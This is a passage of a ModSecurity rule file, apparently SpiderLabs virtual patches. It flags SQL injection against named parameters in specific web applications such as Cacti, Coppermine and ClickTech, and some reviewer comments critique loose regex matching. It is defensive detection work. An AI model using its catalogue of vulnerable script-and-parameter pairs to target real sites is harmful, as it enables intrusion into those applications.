SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009979,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9727'"
# NOTE(review): the key regex is not end-anchored, so it also counts TX entries for
# argument names that merely begin with "id_menu" — confirm whether "ARGS:id_menu$"
# is intended.
SecRule &TX:'/SQL_INJECTION.*ARGS:id_menu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability graph_view graph_list UPDATE
# NOTE(review): unlike most starters in this file, the @contains value has no
# leading "/", so any request line containing the substring "graph_view.php"
# matches, e.g. a longer file name ending in it.
SecRule REQUEST_LINE "@contains graph_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007892,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability graph_view graph_list UPDATE',tag:'web-application-attack',tag:'bugtraq,27749'"
SecRule &TX:'/SQL_INJECTION.*ARGS:graph_list/' "@gt 0"
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability graph_view graph_list UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007897) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id UPDATE SecRule REQUEST_LINE "@contains tree.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007897,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id UPDATE',tag:'web-application-attack',tag:'bugtraq,27749'" SecRule &TX:'/SQL_INJECTION.*ARGS:leaf_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006170) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Calendar MX BASIC SQL Injection Attempt -- calendar_detail.asp ID UPDATE SecRule REQUEST_LINE "@contains /calendar_detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006170,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Calendar MX BASIC SQL Injection Attempt -- calendar_detail.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2993'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Calendar MX BASIC SQL Injection Attempt -- calendar_detail.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006188) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Newsletter MX SQL Injection Attempt -- admin_mail_adressee.asp ID UPDATE SecRule 
REQUEST_LINE "@contains /admin/admin_mail_adressee.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006188,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Newsletter MX SQL Injection Attempt -- admin_mail_adressee.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2998'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Newsletter MX SQL Injection Attempt -- admin_mail_adressee.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007469) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- openPolicy.asp policy UPDATE SecRule REQUEST_LINE "@contains /openPolicy.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007469,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- openPolicy.asp policy UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21090/info'" SecRule &TX:'/SQL_INJECTION.*ARGS:policy/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- openPolicy.asp policy UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007475) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- prodList.asp brand UPDATE SecRule REQUEST_LINE "@contains /prodList.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007475,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- prodList.asp brand 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21090/info'" SecRule &TX:'/SQL_INJECTION.*ARGS:brand/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- prodList.asp brand UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007228) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Blog SQL Injection Attempt -- displayCalendar.asp date UPDATE SecRule REQUEST_LINE "@contains /displayCalendar.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007228,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Blog SQL Injection Attempt -- displayCalendar.asp date UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21310'" SecRule &TX:'/SQL_INJECTION.*ARGS:date/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Blog SQL Injection Attempt -- displayCalendar.asp date UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007234) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp currentpage UPDATE SecRule REQUEST_LINE "@contains /view_gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007234,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp currentpage UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:currentpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp 
currentpage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007240) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp gallery_id UPDATE SecRule REQUEST_LINE "@contains /view_gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007240,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp gallery_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:gallery_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp gallery_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007246) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- download_image.asp image_id UPDATE SecRule REQUEST_LINE "@contains /download_image.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007246,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- download_image.asp image_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:image_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- download_image.asp image_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007252) SpiderLabs Research (SLR) 
Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp currentpage UPDATE SecRule REQUEST_LINE "@contains /gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007252,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp currentpage UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:currentpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp currentpage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp orderby UPDATE SecRule REQUEST_LINE "@contains /gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007258,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp orderby UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:orderby/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp orderby UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007264) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_recent.asp currentpage UPDATE SecRule REQUEST_LINE "@contains /view_recent.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007264,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_recent.asp currentpage UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:currentpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_recent.asp currentpage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007270) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp AlphaSort UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007270,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp AlphaSort UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21302'" SecRule &TX:'/SQL_INJECTION.*ARGS:AlphaSort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp AlphaSort UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007276) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp In UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007276,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp In 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21302'"
# Chain link of the rule whose starter ends on the line above: `&TX:'/regex/'` is
# the number of TX variables whose name matches the regex, and `@gt 0` is true when
# at least one exists. On a match it adds audit-log part E, sets tx.msg and adds
# tx.critical_anomaly_score to tx.anomaly_score.
# NOTE(review): the key regex is not end-anchored and the argument name is only two
# characters, so "ARGS:In" also matches TX entries for any argument whose name
# begins with "In" (this file has a rule for InfoID, for example). Consider
# "ARGS:In$" — confirm against the key format written by the rules that create
# these TX entries.
SecRule &TX:'/SQL_INJECTION.*ARGS:In/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp In UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007282) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp orderby UPDATE
# Chain starter: after the listed t: transformations, tests whether REQUEST_LINE
# contains "/default.asp"; `block` defers the disruptive action to the
# SecDefaultAction in force.
# NOTE(review): "/default.asp" is a common script name and REQUEST_LINE also carries
# the query string, so the starter can match requests to unrelated applications.
# NOTE(review): nothing shown here sets the SQL_INJECTION TX entries the link counts;
# presumably the generic SQL injection rules do, earlier in phase 2 — verify that
# this file is loaded after them.
# NOTE(review): "UPDATE" appears only in the msg text; the pair does not test for the
# keyword, only that some SQL_INJECTION entry exists for the orderby argument.
SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007282,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp orderby UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21302'"
SecRule &TX:'/SQL_INJECTION.*ARGS:orderby/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp orderby UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CodeAvalanche News SQL Injection Attempt -- inc_listnews.asp CAT_ID UPDATE
# Chain starter: same shape as above, keyed on "/inc_listnews.asp".
SecRule REQUEST_LINE "@contains /inc_listnews.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CodeAvalanche News SQL Injection Attempt -- inc_listnews.asp CAT_ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3317'"
SecRule &TX:'/SQL_INJECTION.*ARGS:CAT_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CodeAvalanche News SQL Injection Attempt -- inc_listnews.asp CAT_ID
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006509) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Comersus Shop Cart SQL Injection Attempt -- comersus_optReviewReadExec.asp idProduct UPDATE SecRule REQUEST_LINE "@contains /comersus_optReviewReadExec.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006509,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Comersus Shop Cart SQL Injection Attempt -- comersus_optReviewReadExec.asp idProduct UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24562'" SecRule &TX:'/SQL_INJECTION.*ARGS:idProduct/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Comersus Shop Cart SQL Injection Attempt -- comersus_optReviewReadExec.asp idProduct UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004640) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004640,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:epi/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage 
UPDATE SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004710,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3352'" SecRule &TX:'/SQL_INJECTION.*ARGS:uploadimage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004716) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004716,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3352'" SecRule &TX:'/SQL_INJECTION.*ARGS:p_skin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007341) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ContentNow SQL Injection Attempt -- index.php pageid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007341,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ContentNow SQL Injection Attempt -- index.php pageid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2822'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:pageid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ContentNow SQL Injection Attempt -- index.php pageid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Contra Haber Sistemi SQL Injection Attempt -- haber.asp id UPDATE SecRule REQUEST_LINE "@contains /haber.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006308,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Contra Haber Sistemi SQL Injection Attempt -- haber.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21626'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Contra Haber Sistemi SQL Injection Attempt -- haber.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004815) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE SecRule REQUEST_LINE "@contains /thumbnails.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004815,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3371'" SecRule &TX:'/SQL_INJECTION.*ARGS:cpg131_fav/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005846) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat UPDATE SecRule REQUEST_LINE "@contains /albmgr.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005846,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21894'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- usermgr.php gid UPDATE SecRule REQUEST_LINE "@contains /usermgr.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005852,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- usermgr.php gid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21894'" SecRule &TX:'/SQL_INJECTION.*ARGS:gid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- usermgr.php gid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005858) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- db_ecard.php start UPDATE SecRule REQUEST_LINE "@contains /db_ecard.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005858,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS 
Coppermine Photo Gallery SQL Injection Attempt -- db_ecard.php start UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21894'" SecRule &TX:'/SQL_INJECTION.*ARGS:start/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- db_ecard.php start UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003757) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CreaScripts CreaDirectory SQL Injection Attempt -- error.asp id UPDATE SecRule REQUEST_LINE "@contains /error.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003757,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CreaScripts CreaDirectory SQL Injection Attempt -- error.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3767'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CreaScripts CreaDirectory SQL Injection Attempt -- error.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005864) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CreateAuction SQL Injection Attempt -- cats.asp catid UPDATE SecRule REQUEST_LINE "@contains /cats.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005864,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS 